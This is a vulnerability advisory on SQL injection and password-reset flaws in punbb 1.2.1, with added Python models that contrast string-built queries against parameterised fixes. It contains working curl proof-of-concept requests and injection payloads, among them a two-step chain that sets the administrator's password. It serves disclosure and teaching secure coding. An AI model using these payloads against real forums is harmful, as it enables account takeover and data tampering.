...
- Johannes Gumbel
=================================================
SQL Injections in punbb-1.2.1 register.php
=================================================

Description
-----------

A remote attacker can cause register.php to execute arbitrary SQL
statements by supplying malicious values to the language or email
parameter. The email parameter is guarded by the function
is_valid_email, but this function does no real filtering and will pass
any SQL statement that is formatted to look like an address. This also
affects systems using the magic_quotes_gpc option in php.ini.

Proof of concept
----------------

This example only demonstrates the vulnerability in the language
parameter.

curl --form form_sent=1 \
     --form req_username=sha \
     --form req_password1=passwd \
     --form req_password2=passwd \
     --form req_email1=sha@xxxxxxxxx \
     --form language="English', 'Oxygen', 0, '0.0.0.0', 0) -- " \
     http://target/register.php?action=registerer

This will create a user with language English, style Oxygen and
registration IP 0.0.0.0: the values supplied inside the language
parameter, not the ones register.php meant to store.
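To show what the language payload above actually does to the INSERT, here is an added example (not code from the advisory or from PunBB) that rebuilds a register.php-style string-concatenated INSERT over a constructed SQLite stand-in for the users table and runs the advisory's payload through it, then through the same INSERT with bound parameters. The column set, default style, IP and timestamp values are assumptions made for the demonstration.

```python
import sqlite3

# Constructed stand-in for the users table: only the columns the
# register.php INSERT in the advisory touches. The exact statement text
# is an assumption modelled on the proof of concept, not PunBB's source.
SCHEMA = """
CREATE TABLE users (
    id INTEGER PRIMARY KEY,
    username TEXT, password TEXT, email TEXT,
    language TEXT, style TEXT, registered INTEGER,
    registration_ip TEXT, last_visit INTEGER
)
"""

# The language value from the advisory's proof of concept. It closes the
# quoted literal, supplies its own style/registered/ip/last_visit values,
# closes the VALUES list and comments out whatever register.php appends.
PAYLOAD = "English', 'Oxygen', 0, '0.0.0.0', 0) -- "


def register_vulnerable(conn, username, pw_hash, email, language,
                        style="Lite", now=1100000000, ip="192.0.2.10"):
    """String-built INSERT in the style of the vulnerable register.php.

    Every value is spliced into the statement text, so the attacker's
    language string becomes SQL syntax rather than data."""
    sql = ("INSERT INTO users (username, password, email, language, style, "
           "registered, registration_ip, last_visit) "
           "VALUES('%s', '%s', '%s', '%s', '%s', %d, '%s', %d)"
           % (username, pw_hash, email, language, style, now, ip, now))
    conn.execute(sql)
    return sql


def register_fixed(conn, username, pw_hash, email, language,
                   style="Lite", now=1100000000, ip="192.0.2.10"):
    """Same INSERT with bound parameters: the payload is stored verbatim in
    the language column and the server-chosen style/ip values are kept."""
    conn.execute(
        "INSERT INTO users (username, password, email, language, style, "
        "registered, registration_ip, last_visit) "
        "VALUES(?, ?, ?, ?, ?, ?, ?, ?)",
        (username, pw_hash, email, language, style, now, ip, now))


def stored_row(conn, username):
    """(language, style, registration_ip) as actually stored for a user."""
    return conn.execute(
        "SELECT language, style, registration_ip FROM users WHERE username=?",
        (username,)).fetchone()


def demo():
    """Registers the same payload both ways; returns (vulnerable, fixed) rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    register_vulnerable(conn, "sha", "0" * 40, "sha@example.invalid", PAYLOAD)
    register_fixed(conn, "sha2", "0" * 40, "sha2@example.invalid", PAYLOAD)
    return stored_row(conn, "sha"), stored_row(conn, "sha2")


if __name__ == "__main__":
    vuln, fixed = demo()
    print("string-built INSERT stored: ", vuln)
    print("parameterised INSERT stored:", fixed)
```

The string-built version stores ('English', 'Oxygen', '0.0.0.0'), exactly what the advisory says the real register.php ends up with; the parameterised version stores the whole payload as the language value and keeps the server's own style and IP. The comment at the end of the payload is what lets the attacker ignore the tail of the query, so the check for a forum to apply is simply: does any user-supplied value reach the statement text rather than a bound parameter.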
=======================================================
Multiple vulnerabilities in punbb-1.2.1 profile.php
=======================================================

Description
-----------

A remote attacker without an account can set the password of any user
on the system to NULL, effectively shutting them out of the system.

A user on the system can also inject an arbitrary SQL statement using
the change email feature. This is caused by a fault in the
is_valid_email function, which returns true for strings that are not
even close to being a valid email. This also affects systems using the
magic_quotes_gpc option in php.ini.

By combining these two, an attacker with an account on the forum can
change the password of any user to anything he/she wants, gaining full
access to the administrator account.

Proof of concept
----------------

Examples of the damage the DoS attack and the arbitrary SQL statement
attack can do on their own have been omitted. This is a demonstration
of their power when combined.

Assumptions for this particular example:

- There is a user on the system with id 3 that has username/password
  set to 'sha'/'passwd'.
- The cookie is valid for sha on the system.
- The system supports sha1.
- The new password for the id 2 account is supposed to be 'newpass'.

curl --cookie "punbb_cookie=<valid cookie>" \
     --form form_sent=1 \
     --form req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- sha@xxxxxxxxx" \
     http://target/profile.php?action=change_email\&id=3

This pushes the SHA-1 hash of 'newpass' into every user's
activate_string field: the injected quote closes the string literal and
the comment discards the rest of the UPDATE, including the part that
was meant to restrict it to id 3. All that remains is to move this
field into the password field of the user we want, using the other bug:

curl http://target/profile.php?action=change_pass\&id=2\&key=

Now the account with user id 2 has the password 'newpass'.
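The two-request chain above, as an added example that is not the advisory's or PunBB's code: a constructed SQLite model of the users table, a change_email that splices the address into an UPDATE the way the advisory describes, and a change_pass that accepts an empty key and copies activate_string into password, which is the behaviour the advisory attributes to 1.2.1 (the real check in profile.php is not reproduced here). The activate_key column, the usernames and the passwords are assumptions of the model. Beside each vulnerable function is a fixed one, so the same chain can be run against both.

```python
import hashlib
import hmac
import sqlite3

# Constructed stand-in for the columns the chain touches. The advisory names
# activate_string; activate_key (the confirmation token that key= should be
# checked against) is an assumption of this model, not a column it names.
SCHEMA = """
CREATE TABLE users (
    id INTEGER PRIMARY KEY,
    username TEXT,
    password TEXT,
    activate_string TEXT,
    activate_key TEXT
)
"""

ADMIN_HASH = hashlib.sha1(b"adminpass").hexdigest()   # user id 2, the target
SHA_HASH = hashlib.sha1(b"passwd").hexdigest()        # user id 3, the attacker
NEWPASS_HASH = hashlib.sha1(b"newpass").hexdigest()   # what id 2 should end up with


def seed(conn):
    conn.execute(SCHEMA)
    conn.executemany(
        "INSERT INTO users (id, username, password) VALUES (?, ?, ?)",
        [(2, "admin", ADMIN_HASH), (3, "sha", SHA_HASH)])


def change_email_vulnerable(conn, user_id, new_email):
    """Parks the unconfirmed address in activate_string, spliced unescaped
    (modelled on the advisory's description, not copied from profile.php)."""
    sql = "UPDATE users SET activate_string='%s' WHERE id=%d" % (new_email, user_id)
    conn.execute(sql)
    return sql


def change_pass_vulnerable(conn, user_id, key):
    """Models the 1.2.1 behaviour the advisory describes: an empty key passes
    the check and activate_string (NULL or not) is copied into password."""
    (stored_key,) = conn.execute(
        "SELECT activate_key FROM users WHERE id=?", (user_id,)).fetchone()
    if key != "" and key != stored_key:
        return False
    conn.execute("UPDATE users SET password=activate_string, activate_string=NULL "
                 "WHERE id=?", (user_id,))
    return True


def change_email_fixed(conn, user_id, new_email):
    """Bound parameter: the address is data, and the WHERE clause survives."""
    conn.execute("UPDATE users SET activate_string=? WHERE id=?", (new_email, user_id))


def change_pass_fixed(conn, user_id, key):
    """Requires a non-empty key matching a pending request with a stored hash."""
    row = conn.execute("SELECT activate_key, activate_string FROM users WHERE id=?",
                       (user_id,)).fetchone()
    if not key or row is None or row[0] is None or row[1] is None:
        return False
    if not hmac.compare_digest(key, row[0]):
        return False
    conn.execute("UPDATE users SET password=activate_string, activate_string=NULL, "
                 "activate_key=NULL WHERE id=?", (user_id,))
    return True


def password_of(conn, user_id):
    return conn.execute("SELECT password FROM users WHERE id=?",
                        (user_id,)).fetchone()[0]


def run_lockout():
    """The stand-alone DoS: no account, no injection, just key= left empty."""
    conn = sqlite3.connect(":memory:")
    seed(conn)
    change_pass_vulnerable(conn, 2, "")
    return password_of(conn, 2)          # None: id 2 can no longer log in


def run_chain(change_email, change_pass):
    """Plays the advisory's two requests against a fresh database and returns
    the password hash user id 2 ends up with."""
    conn = sqlite3.connect(":memory:")
    seed(conn)
    # Step 1: attacker (id 3, logged in) submits a "new e-mail" that closes
    # the literal and comments out the rest of the UPDATE.
    change_email(conn, 3, NEWPASS_HASH + "' -- sha@example.invalid")
    # Step 2: anyone, no cookie needed, requests change_pass for id 2 with key=
    change_pass(conn, 2, "")
    return password_of(conn, 2)


if __name__ == "__main__":
    print("lockout leaves password:", run_lockout())
    print("vulnerable chain gives attacker's hash:",
          run_chain(change_email_vulnerable, change_pass_vulnerable) == NEWPASS_HASH)
    print("fixed chain keeps admin's hash:",
          run_chain(change_email_fixed, change_pass_fixed) == ADMIN_HASH)
```

Run against the vulnerable pair, the first request overwrites activate_string on every row and the second copies it into id 2's password, so the attacker's chosen hash is now the administrator's. Against the fixed pair the injected string is stored, harmlessly, as id 3's pending address and the empty key is rejected, so id 2 keeps its original hash. The two fixes are independent: parameterising change_email alone still leaves the lockout, and tightening the key check alone still leaves the SQL injection.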
==============================================
SQL Injections in punbb-1.2.1 moderate.php
==============================================

Description
-----------

Improper handling of several arguments in moderate.php allows a
malicious moderator (or admin) to inject arbitrary SQL statements.
This also affects systems using the magic_quotes_gpc option in php.ini.

Proof of concept
----------------

These examples will not do anything malicious or even cause the system
to report an error. Instead they are crafted so that simply adding a ;
or ' just before the comment "-- this won't show" will make the SQL
query fail, demonstrating that injection is possible.

Assumptions:

- punbb_cookie contains identification of a moderator for the forum
  with id 1.

Attack on delete posts:

curl --referer http://target/moderate.php \
     --form posts="0) -- this won't show" \
     --form delete_posts_comply=1 \
     --cookie "punbb_cookie=<valid cookie>" \
     target/moderate.php?fid=1\&tid=1

Attack on move topics:

curl --referer http://target/moderate.php \
     --form topics="2) -- this won't show" \
     --form move_to_forum=2 \
     --form move_topics=1 \
     --form move_topics_to=1 \
     --cookie "punbb_cookie=<valid cookie>" \
     target/moderate.php?fid=1

Attack on delete topics:

curl --referer http://target/moderate.php \
     --form topics="2) -- this won't show" \
     --form delete_topics=1 \
     --form delete_topics_comply=1 \
     --cookie "punbb_cookie=<valid cookie>" \
     target/moderate.php?fid=1

Attack on open/close:

curl --referer http://target/moderate.php \
     --form "topics[0) -- this won't show]=" \
     --form open=1 \
     --cookie "punbb_cookie=<valid cookie>" \
     target/moderate.php?fid=1
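The moderate.php payloads differ from the earlier ones in that the injected value sits in a numeric context: an id list inside IN(), where no quote character is needed and escaping quotes would not have helped. As an added example (not the advisory's or PunBB's code), the block below models a delete-topics query over a constructed SQLite topics table, joins the submitted ids into the statement the way an implode() would, and shows the advisory's "2) -- this won't show" value removing a topic from a forum the moderator does not control. The query shape with its forum_id restriction is an assumption modelled on the payloads; the fixed variant casts every id to an integer and binds them.

```python
import sqlite3

# Constructed stand-in for the topics table; the query shape (an IN() list
# plus a forum_id restriction) is an assumption modelled on the advisory's
# payloads, not copied from moderate.php.
SCHEMA = "CREATE TABLE topics (id INTEGER PRIMARY KEY, forum_id INTEGER, subject TEXT)"


def delete_topics_vulnerable(conn, forum_id, topic_ids):
    """implode()-style: the submitted ids are joined into the statement text.

    The ids sit in a numeric context, so no quote is needed: "2) -- " closes
    the IN() list and comments out the forum_id check that follows."""
    sql = "DELETE FROM topics WHERE id IN(%s) AND forum_id=%d" % (
        ",".join(topic_ids), forum_id)
    conn.execute(sql)
    return True


def delete_topics_fixed(conn, forum_id, topic_ids):
    """Casts every id to int before building a placeholder list, so the
    statement text never contains attacker-supplied bytes."""
    try:
        ids = [int(t) for t in topic_ids]
    except ValueError:
        return False                     # "2) -- ..." is not an integer
    if not ids:
        return False
    placeholders = ",".join("?" * len(ids))
    conn.execute("DELETE FROM topics WHERE id IN(%s) AND forum_id=?" % placeholders,
                 (*ids, forum_id))
    return True


def run(delete_fn):
    """A moderator of forum 1 submits the advisory's topics payload; returns
    the topic ids that survive."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO topics VALUES (?, ?, ?)",
                     [(1, 1, "in forum 1"), (2, 2, "in forum 2, off limits")])
    delete_fn(conn, 1, ["2) -- this won't show"])
    return [row[0] for row in conn.execute("SELECT id FROM topics ORDER BY id")]


if __name__ == "__main__":
    print("surviving topics, vulnerable:", run(delete_topics_vulnerable))
    print("surviving topics, fixed:     ", run(delete_topics_fixed))
```

With the vulnerable join the forum-1 moderator deletes topic 2, which lives in forum 2, because the comment removed the `AND forum_id=1` that was supposed to confine the request; with the integer cast the payload is rejected before any SQL is built and both topics remain. This is also the cheapest check when auditing similar code: every id that reaches an IN() list should have passed through an integer cast or a bound parameter first.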